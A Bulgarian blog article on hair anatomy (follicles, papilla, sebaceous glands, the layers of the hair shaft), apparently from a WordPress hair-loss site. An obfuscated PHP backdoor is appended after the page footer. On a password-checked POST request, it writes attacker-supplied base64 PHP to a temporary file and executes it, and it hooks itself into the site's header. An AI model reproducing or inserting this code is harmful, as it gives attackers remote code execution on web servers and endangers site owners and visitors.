Косъм – устройство | Косопад

Косъм – устройство

Косата е много по – сложна по състав и устройство, отколкото изглежда на пръв поглед. Всички ние знаем, че тя не само играе изключително важна роля във външния вид, но и спомага за предаване на биологична информация като пол и възраст.

устройство на косата

Косата започва своето развитие още в утробата на бременната жена, а на 22 – а седмица плодът вече има развити космени фоликули. На този етап обичайно съществуват около 5 000 000 космени фоликули, разпределени по главата и тялото. От тях 1 000 000 се намират на главата, като 100 000 от тях са разположени на скалпа. От научна гледна точка е важно да се разбере, че броят на космените фоликули остава непроменен през целия живот. Това е една от причините за намаляване плътността на косата при напредване на възрастта – скалпа просто расте и се разширява.

Космени фоликули

Структурирани са от две отделни части: първо самата фоликула, която се намира в кожата; и второ – частта, която се вижда в края на скалпа. Можем спокойно да приемем, че косменият фоликул е тунел в епидермиса, който се простира надолу в протежение на дермата. Структурата съдържа няколко слоя, изпълняващи различни функции.

В основата на фоликула се намира папила, която има капиляри – малки кръвоносни съдове, подхранващи клетките. Папилата е заобиколена от космена луковица, чиито клетки се делят на всеки 23 до 72 часа – в пъти по – бързо, от която и да било друга клетка в организма.

Фоликулът е защитен от две обвивки – вътрешна и външна. Вътрешната по принцип следва косъма и завършва под отвора на мастните жлези, а в някои случаи и при апокринните жлези. Външната обвивка естествено е по – голяма. Мастните жлези са от жизненоважно значение за космите, защото произвеждат необходимият за косата себум. След пубертета тялото започва да прави повече себум, но с напредване на възрастта количеството отново намалява.

Косъм

Космите са съставени от твърд протеин, който се нарича кератин и имат три слоя. Не изпитват болка, тъй като този протеин е „мъртъв”, следователно можем да кажем, че косата не е жива структура. Първият слой (външният) се състои от един ред плоски клетки, които нямат пигмент. Вторият (кортикален) е съставен от няколко реда продълговати клетки, които са пълни с мелазономи и кератин. Третият слой се нарича медуларен и се състои от клетки, които все още са в процес на изграждане.

28. декември 2013 17:24:52 от Косопад
Категории: Косопад – Статии | Етикети: , | Напишете Коментар

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}